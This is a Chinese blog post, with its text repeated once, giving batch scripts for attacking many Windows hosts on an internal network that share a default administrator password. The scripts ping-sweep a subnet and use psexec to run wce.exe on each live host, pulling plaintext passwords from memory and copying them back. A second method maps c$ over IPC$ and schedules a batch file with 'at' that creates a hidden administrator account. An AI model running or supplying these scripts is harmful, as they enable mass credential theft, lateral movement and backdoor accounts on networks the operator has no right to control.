批量登录内网主机并执行命令(window)
2015-07-03 09:30
232 查看
当前环境:知道网内多个主机的默认密码(管理员),每台主机会有不同用户登录进来,现在想读取登录到主机其他用户的密码,但主机太多不想一个一个登录进去读密码。
1.psexec
解决办法如下:(批量链接抓取内存中的明文密码)
首先应用场景:多台windows主机使用同一密码的情况(例如网内如果用了虚拟化产品)
tips:
psexec: 是在指定的一台或多台计算机上运行应用程序
wce.exe:从内存当中获取明文的工具
还要另外一种不用psexec工具的方法
2.IPC
写个bat
循环读取txt中的主机
ipc连接过去
复制读密码的工具和一个运行工具的bat过去
创建和运行计划任务或者使用at命令
等待2秒
复制结果文件回来
删除目标上面的文件
断开连接
例子(用于添加用户)
本文出自 “Sanr” 博客,请务必保留此出处http://0x007.blog.51cto.com/6330498/1670422
1.psexec
解决办法如下:(批量链接抓取内存中的明文密码)
首先应用场景:多台windows主机使用同一密码的情况(例如网内如果用了虚拟化产品)
for /l %%i in (1,1,253) do echo 192.168.1.%%i >>ip.txt (按网段生成ip列表,现在的环境254为网关,所以地址到253止) for /f %%i in (ip.txt) do ping -n 1 -w 10 %%i | find /i "ttl" >nul && echo %%i >>ok.txt (判断存活主机,同网段内一般是不禁ping的)
del ip.txt for /f %%i in (ok.txt) do psexec \\%%i -u 用户名 -p 密码 -c wce.exe -w -o %%i.txt && move /y \\%%i\admin$\system32\%%i.txt .\ip\(从存活的主机列表里逐个按已知帐号密码尝试远程执行命令,psexec -c参数是复制并执行wce.exe,执行完会自动删除wce.exe,-w读取明文帐号密码 -o保存到以ip命名的文件,然后将文件剪切到本地)
del ok.txt cd ip for %i in (*) do for /f %j in (%i) do echo %j >>ok.txt(将多个文件合并) for /f %i in (ok.txt) do findstr "%i" "result.txt" >nul || echo %i >>result.txt(去重)
tips:
psexec: 是在指定的一台或多台计算机上运行应用程序
wce.exe:从内存当中获取明文的工具
还要另外一种不用psexec工具的方法
2.IPC
写个bat
循环读取txt中的主机
ipc连接过去
复制读密码的工具和一个运行工具的bat过去
创建和运行计划任务或者使用at命令
等待2秒
复制结果文件回来
删除目标上面的文件
断开连接
例子(用于添加用户)
net use //1.1.1.1/c$ "用户名" /user:"密码" echo net user fuckuser Passw0rd! /add >c:\1.bat & net localgroup administrators fuckuser /add >> c:\1.bat copy 1.bat \\1.1.1.1\c$\ net time \\1.1.1.1 at \\1.1.1.1 11:30 c:\1.bat
本文出自 “Sanr” 博客,请务必保留此出处http://0x007.blog.51cto.com/6330498/1670422
相关文章推荐
- extern使用总结!
- CentOS 上网速度慢的解决办法
- Docker 开发实践
- linux冷知识之打开防火墙的特定端口[待完善]
- LA 3989 Ladies'Choice(稳定婚姻问题)
- VC6.0下载地址
- nodejs爬虫抓取数据乱码问题总结
- ubuntu 杀死进程
- 详解SQLite中的数据类型
- 7、mv命令
- 织梦取文章内图片做缩略图
- 联网查看图片的Demo
- 重踏学习Java路上_Day16(List的子类,泛型,增强for循环,静态导入,可变参数)
- ospf
- Maven Tomcat7自动部署
- python插入排序算法实例分析
- 随机森林和GBDT的几个核心问题
- 手势识别技术的一个简介 转载
- 正则表达 中文下 gbk utf-8 的区别
- hibernate配置文件hibernate.cfg.xml的详细解释